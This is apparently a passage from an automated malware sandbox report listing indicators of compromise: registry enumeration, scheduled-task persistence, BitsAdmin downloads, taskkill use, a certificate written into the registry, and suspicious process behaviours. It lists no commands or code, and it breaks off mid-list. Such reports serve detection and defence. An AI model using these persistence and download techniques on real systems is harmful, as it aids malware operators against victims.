WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Xanobezhyju.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1112 schtasks.exe 6060 schtasks.exe 7824 schtasks.exe 3320 schtasks.exe 5112 schtasks.exe 4264 schtasks.exe 5388 schtasks.exe 4168 schtasks.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid process 25220 bitsadmin.exe 2768 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
cmd.exeWerFault.execmd.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exemsedge.exeInstall.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeXanobezhyju.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Xanobezhyju.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Xanobezhyju.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5976 taskkill.exe 6044 taskkill.exe 3392 taskkill.exe 5284 taskkill.exe -
Modifies data under HKEY_USERS 47 IoCs
Processes:
sihclient.exesvchost.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe -
Modifies registry class 10 IoCs
Processes:
VC_redist.x86.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\ = "{a8968509-65be-4c09-a460-fd1584b1cdbf}" VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents\{a8968509-65be-4c09-a460-fd1584b1cdbf} VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Version = "14.29.30040.0" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\DisplayName = "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30040" VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWed15566afaea59e.exe2420799.scrcmd.execmd.exeultramediaburner.tmpcmd.exeWerFault.exeschtasks.exepid process 476 powershell.exe 476 powershell.exe 5352 Wed15566afaea59e.exe 5352 Wed15566afaea59e.exe 476 powershell.exe 5788 2420799.scr 5788 2420799.scr 4760 cmd.exe 4760 cmd.exe 3204 cmd.exe 3204 cmd.exe 6048 ultramediaburner.tmp 6048 ultramediaburner.tmp 1440 cmd.exe 1440 cmd.exe 5980 WerFault.exe 5980 WerFault.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe 1112 schtasks.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3212 7396 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
RUW_kzSDDh7kY9iBvGNxl4kc.exe3E81.exepid process 5012 RUW_kzSDDh7kY9iBvGNxl4kc.exe 5952 3E81.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
7195126.scr6130498.scrpid process 6072 7195126.scr 7100 6130498.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
